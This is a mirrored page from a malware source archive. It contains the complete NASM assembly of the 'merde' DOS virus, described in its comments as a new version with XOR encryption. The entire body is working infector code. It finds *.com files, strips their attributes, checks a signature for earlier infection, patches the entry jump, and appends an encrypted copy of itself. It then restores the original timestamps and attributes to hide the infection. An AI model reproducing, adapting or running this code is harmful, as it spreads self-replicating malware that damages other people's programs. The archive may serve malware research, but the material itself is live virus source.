mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
203 lines
4.7 KiB
NASM
203 lines
4.7 KiB
NASM
;well, here's the next installment of the merde virus...all that is new;
|
||
;is your run of the mill xor encryption........and a little change in;
|
||
;the code itself to make it slightly more modular...;
|
||
;up+coming: .exe version(why put 'em together? makes it too big);
|
||
; an actual function besides infect!;
|
||
; TSR infect version?;
|
||
attrib equ 21
|
||
time equ 22
|
||
date equ 24
|
||
fspec_address equ 0e4h
|
||
filesize equ 26
|
||
fname equ 30
|
||
dta equ 80h
|
||
virsize equ 354
|
||
byte_compare_val equ 35
|
||
CODE_SEG SEGMENT BYTE
|
||
ASSUME DS:CODE_SEG, CS:CODE_SEG
|
||
ORG 100h
|
||
first: jmp caller
|
||
db 128 dup(00)
|
||
caller: call caller2 ;si=this address for the whole thing;
|
||
|
||
;ok, for encryption, we use the value of the byte at the jump instruction;
|
||
;if the file we find isn't infected...;
|
||
|
||
encryptv: db ?
|
||
|
||
;si=offset of the "caller";
|
||
|
||
caller2: pop si
|
||
sub si,3
|
||
jmp getstart
|
||
|
||
;jmp to getstart and have it call us back, getting the address of "start";
|
||
;into es..(I know, why not just add the size of the stuff to si?;
|
||
;I'll do it some other time;
|
||
|
||
after: pop es ;es=start:;
|
||
|
||
;okay, I decided, arbitrarily, to use bp and jump from the encrypt;
|
||
;function so it was more unsingular to a particular circumstance;
|
||
|
||
mov bp,es ;unencrypt de code+jump to virus;
|
||
jmp encrypt
|
||
|
||
;if we are being called from the write proc, we need to save BP on the stack;
|
||
|
||
encrypt_w: mov ax,bp ;ax=whereto jump at end;
|
||
pop bp ;bp=return to write routine;
|
||
push ax ;where to jump at end is on stack
|
||
;note the standard, run o' the mill encrypt/decrypt!;
|
||
|
||
encrypt: push bx ;might not be needed, I'll check later;
|
||
push si
|
||
mov cl,[si+3] ;offset of encrypt value;
|
||
mov bx,es ;where to start encrypting;
|
||
xor si,si
|
||
xloop: mov al,[bx+si]
|
||
xor al,cl
|
||
mov [bx+si],al
|
||
cmp si,0e7h ;size of post-start(or close enough);
|
||
ja done
|
||
inc si
|
||
jmp xloop
|
||
done: pop si
|
||
pop bx
|
||
jmp bp ;jump whereever we were supposed to;
|
||
|
||
write_code: call encrypt_w ;yep, encrypt it;
|
||
pop bp ;get back address in this infected file;
|
||
mov bx,[di+9] ;file to jump to, and file handle;
|
||
mov ah,40h
|
||
mov cx,virsize ;total virus size
|
||
mov dx,si
|
||
int 21h
|
||
call close_current
|
||
jmp nofiles ;not really, just didn't change name;
|
||
;this proc closes the file with original stats;
|
||
close_current:
|
||
mov dx,[di+14]
|
||
mov cx,[di+12]
|
||
mov ax,5701h
|
||
mov bx,[di+9]
|
||
int 21h
|
||
mov ah,3eh
|
||
int 21h
|
||
mov ax,4301h
|
||
xor ch,ch
|
||
mov cl,[di+11]
|
||
int 21h
|
||
ret
|
||
nofiles: push ds
|
||
pop es
|
||
jmp bp
|
||
|
||
getstart: call after
|
||
|
||
|
||
;encrypted from here on out-es=start of this procedure;
|
||
start: mov di,es
|
||
add di,fspec_address ;di=ADDRESS OF FILESPEC!;
|
||
mov dh,[di+18]
|
||
mov ah,[di+17]
|
||
mov al,[di+16]
|
||
mov bx,100h
|
||
mov [bx],al
|
||
mov [bx+1],ah
|
||
mov [bx+2],dh
|
||
mov bp,bx
|
||
mov ah,4eh ;------------------;
|
||
mov cx,33
|
||
mov dx,di ;find file match;
|
||
search: int 21h
|
||
jc nofiles ;get out if none found;
|
||
mov bx,dta+filesize ;compare filesize via BX;
|
||
cmp word ptr [bx],65000
|
||
ja leave1
|
||
cmp word ptr [bx],150
|
||
jb leave1
|
||
jmp ok
|
||
leave1: mov ah,4fh
|
||
jmp search
|
||
ok: CLC
|
||
|
||
;Okay-- DI=base of fspec;
|
||
mov bx,dta+attrib
|
||
mov al,[bx]
|
||
mov [di+11],al ;save attrib;
|
||
mov ax,word ptr [bx+1]
|
||
mov [di+12],ax ;save time;
|
||
mov ax,word ptr [bx+3]
|
||
mov [di+14],ax ;save date;
|
||
mov ax,4301h
|
||
mov cx,0
|
||
mov dx,dta+fname
|
||
int 21h ;set attrib to 0;
|
||
label2: mov ax,3d02h
|
||
int 21h
|
||
mov [di+9],ax ;open + save handle;
|
||
mov bx,ax
|
||
mov ah,3fh
|
||
mov cx,3
|
||
mov dx,di
|
||
add dx,16 ;dx points to save area for first three bytes;
|
||
int 21h ;open handle, and read 3 bytes into it;
|
||
cmp byte ptr [di+16],0e9h
|
||
jne label1
|
||
cont: mov ax,4200h
|
||
xor cx,cx
|
||
mov dx,[di+17]
|
||
add dx,3+byte_compare_val
|
||
mov bx,[di+9]
|
||
int 21h
|
||
mov ah,3fh
|
||
mov cx,2
|
||
mov dx,di
|
||
add dx,6
|
||
int 21h
|
||
mov dx,[di+6]
|
||
cmp dx,[si+byte_compare_val]
|
||
jne label1
|
||
call close_current
|
||
jmp leave1
|
||
label1:
|
||
;set encrypt value here---(low order byte of filesize of next file;
|
||
mov bx,dta+filesize
|
||
mov dl,[bx]
|
||
mov [si+3],dl
|
||
mov bx,[di+9]
|
||
mov ax,4200h
|
||
xor cx,cx
|
||
mov dx,0
|
||
int 21h
|
||
;okay, this is kinda thick..;
|
||
;set pointer to after jmp instruct, and change address to size;
|
||
;of file plus 3 for jmp instruction, minding that we have to flip stuff;
|
||
mov bx,dta+filesize
|
||
mov dh,[bx+1] ;high val equals 2nd part of word+vice versa;
|
||
mov dl,[bx]
|
||
sub dx,3
|
||
mov [di+7],dx
|
||
mov byte ptr [di+6],0e9h
|
||
mov ah,40h
|
||
mov bx,[di+9]
|
||
mov dx,di
|
||
add dx,6
|
||
mov cx,3
|
||
int 21h
|
||
xor cx,cx
|
||
mov ax,4202h
|
||
xor dx,dx
|
||
int 21h
|
||
jmp write_code
|
||
|
||
fspec: db '*.com',0 ;bx+0;
|
||
disk_buffer: db 3 DUP(?) ;di+6;
|
||
handle: dw ? ;di+9;
|
||
attribute: db ? ;di+11;
|
||
otime: dw ? ;di+12;
|
||
odate: dw ? ;di+14;
|
||
first_3: db 0cdh,20h,00 ;di+16;
|
||
CODE_SEG ENDS
|
||
END first |